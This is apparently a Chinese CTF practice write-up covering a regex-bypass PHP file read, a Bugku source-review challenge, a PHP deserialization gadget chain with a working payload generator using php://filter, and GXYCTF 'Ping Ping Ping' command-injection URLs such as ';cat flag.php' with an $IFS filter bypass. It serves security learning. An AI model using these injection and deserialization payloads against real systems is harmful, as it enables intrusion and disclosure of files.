周練4
阿新 • • 發佈:2022-05-07
No one knows regex better than me
<?php
// CTF challenge source ("No one knows regex better than me").
// Reads two request parameters, runs them through deny-list regexes, and
// finally calls highlight_file() on a path built from the same input.
error_reporting(0); // suppresses every diagnostic, so a failed decode/open stays silent
$zero=$_REQUEST['zero'];   // $_REQUEST merges GET, POST and COOKIE input
$first=$_REQUEST['first'];
$second=$zero.$first;
// Case-insensitive alternation; because "a" is one of the alternatives, any
// input containing that letter passes this gate.
if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){
    $key=$second; // zero and first together must contain one of the alternatives above
    // Deny-list applied to the RAW concatenation only; the path opened further
    // down is built from base64_decode($zero), which this check never inspects.
    if(preg_match("/\.\.|flag/",$key)){ // zero and first must not contain ".." or "flag"
        die("Noooood hacker!");
    }else{
        $third=$first; // characters: >/>|
        // The pattern decodes to the literal sequence "|.php"
        // (\056 = '.', \160 = 'p', \150 = 'h', \x70 = 'p'), case-insensitive.
        if(preg_match("/\\|\056\160\150\x70/i",$third)){ // first contains "|.php"
            $end=substr($third,5); // keep everything after the first five characters
            // Check-vs-use mismatch: the file actually opened is
            // base64_decode($zero).$end, a value the regexes above did not see.
            // The robust fix is an allow-list of permitted files (resolve with
            // realpath() and compare against a fixed directory), not a deny-list
            // on the raw parameters.
            highlight_file(base64_decode($zero).$end);//maybe flag in flag.php
        } //base64 decode
    }
} else{
    highlight_file(__FILE__);
}
first=abcd|.php&zero=ZmxhZw==
never_give_up
%3Cscript%3Ewindow.location.href%3D'http%3A%2F%2Fwww.bugku.com'%3B%3C%2Fscript%3E%20%0A%3C!--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--%3E
";if(!$_GET['id'])//如果id=0或無法通過get獲得id變數
{ //header() 函式向客戶端傳送或更改原始的 HTTP 報頭 header('Location: hello.php?id=1');//跳轉到hello.php檔案且設定id=1
exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')){ //$a檔案中不能有.
echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r'); //把整個檔案讀入一個字串中 if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4) { //弱型別比較 //b的長度大於5 //eregi截斷漏洞 require("f4l2a3g.txt"); } else { print "never never never give up !!!"; } ?>
stripos() 函式查詢字串在另一字串中第一次出現的位置（不區分大小寫），如果沒有找到字串則返回 FALSE
strripos() - 查詢字串在另一字串中最後一次出現的位置(不區分大小寫)
strpos() - 查詢字串在另一字串中第一次出現的位置(區分大小寫)
strrpos() - 查詢字串在另一字串中最後一次出現的位置(區分大小寫)
Pop2022
<?php
// CTF challenge source (Pop2022): a deserialization gadget chain.
// User input from $_GET['wish'] goes straight into unserialize(); that call is
// the sink a defender removes (use json_decode() for data interchange, or at
// minimum unserialize($s, ['allowed_classes' => false]) so no objects are built).
if(isset($_GET['wish'])){
    @unserialize($_GET['wish']); // '@' hides the notice raised on malformed input
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
    public $page;
    public $string;

    public function __construct($file='index.php'){
        $this->page = $file;
    }

    // String conversion reads ->page of whatever ->string holds; if that object
    // has no "page" property, PHP dispatches to its __get().
    public function __toString(){
        return $this->string->page; //3. __get
    }

    // Runs on unserialize(). preg_match() needs a string subject, so an object
    // stored in ->page is converted through __toString() first -- the deny-list
    // check is itself the trigger. The list also names only some stream
    // wrappers; an allow-list of concrete file names is the robust replacement.
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) //4. __toString()
            echo "You can Not Enter 2022";
        $this->page = "index.php";
    }
}
} // NOTE(review): one closing brace too many in the pasted source; the original challenge presumably wraps the echo and the reset in an if-body -- verify against the challenge file
class Try_Work_Hard{
    protected $var;

    // include() of a value that unserialize() can populate: the inclusion sink.
    public function append($value){
        include($value);
    }

    public function __invoke(){
        $this->append($this->var); //1. target
    }
}
class Make_a_Change{
    public $effort;

    // unserialize() does not run constructors, so ->effort holds whatever the
    // serialized data says, not this empty array.
    public function __construct(){
        $this->effort = array();
    }

    // Undefined-property access calls whatever ->effort holds; any object with
    // __invoke() qualifies.
    public function __get($key){
        $function = $this->effort;
        return $function(); //2. __invoke()
    }
}
/**********************Try to See flag.php*****************************/
<?php
// Payload generator for the challenge above. Only the property declarations
// are reproduced, because serialize() records property names and values, not
// methods; the target's own class definitions supply the magic methods, so the
// chain __wakeup -> __toString -> __get -> __invoke -> include() runs there.
class Try_Work_Hard{
    // Visibility must match the target's declaration for the serialized
    // property to map onto the same field.
    protected $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
class Road_is_Long{
    public $page;
    public $string;
}
class Make_a_Change{
    public $effort;
}
$a = new Road_is_Long();
$b = new Road_is_Long();
$c = new Make_a_Change();
$d = new Try_Work_Hard();
$a -> page = $b;    // __wakeup()'s preg_match() on ->page string-converts $b
$b -> string = $c;  // $b->__toString() reads $c->page, an undefined property
$c -> effort = $d;  // $c->__get() calls $d(), i.e. Try_Work_Hard::__invoke()
echo urlencode(serialize($a)); // URL-encoded for transport as a query parameter
[GXYCTF2019]Ping Ping Ping1
1/?ip=223.90.190.171;ls /
http://16dc0771-6141-4696-a38f-d72e1ea26a40.node4.buuoj.cn:81/?ip=1|ls
http://16dc0771-6141-4696-a38f-d72e1ea26a40.node4.buuoj.cn:81/?ip=1;cat flag.php
http://16dc0771-6141-4696-a38f-d72e1ea26a40.node4.buuoj.cn:81/?ip=1;a=g;cat$IFS$9fla$a.php